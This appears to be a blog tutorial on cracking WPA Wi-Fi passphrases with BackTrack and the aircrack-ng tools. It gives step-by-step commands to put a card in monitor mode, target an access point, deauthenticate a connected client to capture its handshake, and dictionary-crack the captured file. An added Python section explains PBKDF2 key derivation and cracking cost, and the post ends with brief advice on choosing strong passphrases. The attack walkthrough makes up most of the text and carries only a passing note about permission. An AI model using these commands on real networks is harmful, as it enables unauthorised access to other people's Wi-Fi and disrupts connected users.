Introduction
Cracking WPA is not nearly as easy as cracking WEP. I will forgo a lengthy encryption explanation and just say the primary difference is that a WEP key can be recovered from capturing enough packets, whereas a WPA passphrase has to be checked against a dictionary file. If the passphrase is not in the dictionary, it will not be found. It will take time and may yield no results.
The positive side is that cracking WPA is an ‘offline’ attack, meaning you capture a single handshake and do everything else later. The convenience factor is that you can capture someone’s handshake (with their permission, of course) with your laptop, go home, and run the crack on your desktop for more power.
Since I usually find that there’s generally too much explanation involved in these tutorials, I will attempt to keep it simple.
Required Items
- A Wireless Router with WPA encryption
- A Wireless Card Capable of Injection (I prefer Atheros Cards)
- A Copy of BackTrack Linux
- A USB Key (2GB or larger) or DVD Burner
The Steps
First, you need BackTrack on a DVD or USB Key. If using a DVD, use your own software, but if you’re using a USB Key, please follow these instructions.
Preparing your USB Key for Booting with BackTrack
First, plug your USB Key into your computer and format it with FAT32.
Download and run UNetbootin.
Select “Diskimage”, point UNetbootin to the location of your BackTrack ISO file, then make sure the drive letter of your USB drive is selected.
Click OK and wait for UNetbootin to finish copying files to the USB Key.
When complete, you can click “Reboot Now” or “Exit” to finish.
Booting into BackTrack
Restart your computer with the disc or USB Key inserted and press your computer’s boot-selection key, usually F2 or F12.
Once you’re at the prompt, type:
root@bt:~# startx
This will place you into the X Windows environment and make it easier to run multiple shell windows.
Let’s Get Started – Capturing the Handshake
Open a terminal.
Let’s set the card in monitor mode:
airmon-ng start wlan0
and look for our target AP:
airodump-ng mon0
We have the info we need, now let’s focus on just our target AP:
airodump-ng -c (chan) -w (capfile) --bssid (apmac) (iface)
Mine:
airodump-ng -c 5 -w wpa.cap --bssid 0A:15:6D:E8:A8:78 mon0
Notice that there’s a client connected right now; we need that client. Why? Because we need to send a deauth command in order to catch the ‘handshake’ when it reconnects.
Open a second terminal window and use the following command to de-authenticate the client:
aireplay-ng -0 1 -a (apmac) -c (clientmac) (iface)
Mine:
aireplay-ng -0 1 -a 0A:15:6D:E8:A8:78 -c 00:1A:73:50:61:DD mon0
The client de-authenticated and reconnected. You should now have the handshake in your cap file. If the top line of the airodump-ng window shows “WPA handshake:” followed by the AP’s MAC address, you’re good to go!
Success! You may now close both of these terminal windows. We have the handshake we need and can start the cracking.
Cracking – the hard part
So we have our capture and now we’re ready to start cracking the password. Remember that this could take a long time and may not complete at all!
I have prepared the following dictionary file for use with WPA cracking; please download it: REMOVED: Please See This Post.
It’s not a very good wordlist, but it will do.
Let’s do this:
aircrack-ng -w wpalist.txt -b (BSSID) (capfile)
Mine:
aircrack-ng -w wpalist.txt -b 0A:15:6D:E8:A8:78 wpa.cap-01.cap
(airodump-ng treats the value given to -w as a file prefix, so the capture written by the earlier command is wpa.cap-01.cap, not wpa.cap.)
There we go! Our password is cracked, and in almost 16 minutes. Your success may vary and, as I said before, you may not crack it at all.
You could look elsewhere for a larger dictionary file. If you REALLY want the password cracked, there are online cloud-based cracking services, but they all charge money.
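Why the crack is a dictionary attack in the first place, and why it takes a long time, follows from how WPA/WPA2-PSK turns the passphrase into a key: PBKDF2-HMAC-SHA1, salted with the SSID and run for 4096 iterations, producing a 256-bit Pairwise Master Key (PMK). Every candidate costs the same work, a candidate is only useful for the one SSID it was salted with, and a passphrase that is not in the wordlist is never found. The following added example (not code from the tutorial or from aircrack-ng) derives the PMK with the standard parameters, checks it against the published IEEE 802.11i Annex H test vector, and puts numbers on the worst-case time for a wordlist versus a random passphrase; the candidate strings and the 10-million-word figure are assumptions chosen for the illustration.

```python
"""Derive a WPA/WPA2-PSK Pairwise Master Key and cost out a dictionary search.

Added example for this page; not the tutorial's code. The test vector is the
"password"/"IEEE" pair from IEEE 802.11i Annex H.
"""
import hashlib
import time

PBKDF2_ITERATIONS = 4096  # fixed by 802.11i
PMK_LENGTH = 32           # 256-bit PMK (two SHA1-sized output blocks, so 8192 HMAC-SHA1 calls)

# IEEE 802.11i Annex H: passphrase "password", SSID "IEEE"
IEEE_TEST_VECTOR = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).

    The SSID is the salt, so a PMK computed for one network name is useless
    against a network with a different name."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def matches_test_vector() -> bool:
    """Sanity check of the derivation against the published vector."""
    return derive_pmk("password", "IEEE").hex() == IEEE_TEST_VECTOR


def guesses_per_second(sample: int = 20) -> float:
    """Measure candidate-to-PMK throughput on this CPU in pure Python.

    A GPU cracker is orders of magnitude faster, but it pays the same 4096
    iterations per guess; the ratio between wordlist and keyspace is what
    matters. Candidate strings here are constructed, not a real wordlist."""
    start = time.perf_counter()
    for i in range(sample):
        derive_pmk(f"candidate{i:04d}", "IEEE")
    return sample / (time.perf_counter() - start)


def seconds_to_exhaust(candidates: int, rate: float) -> float:
    """Worst-case time to try every candidate at `rate` guesses per second."""
    return candidates / rate


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of `length` characters over an alphabet; a random
    passphrase is drawn from here and appears in no wordlist."""
    return alphabet_size ** length


if __name__ == "__main__":
    print("test vector ok:", matches_test_vector())
    rate = guesses_per_second()
    print(f"{rate:.0f} guesses/s in pure Python")
    # Assumed 10-million-entry wordlist versus a random 12-character lowercase passphrase
    print(f"10M-word list, worst case: {seconds_to_exhaust(10_000_000, rate) / 3600:.1f} h")
    years = seconds_to_exhaust(keyspace(26, 12), rate) / (365 * 24 * 3600)
    print(f"12 random lowercase chars, worst case: {years:.2e} years")
```

The practical reading for anyone running their own network: a long random passphrase and a non-default SSID (so no precomputed table applies) are what make the handshake in the capture file useless to whoever holds it.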
Thanks for reading!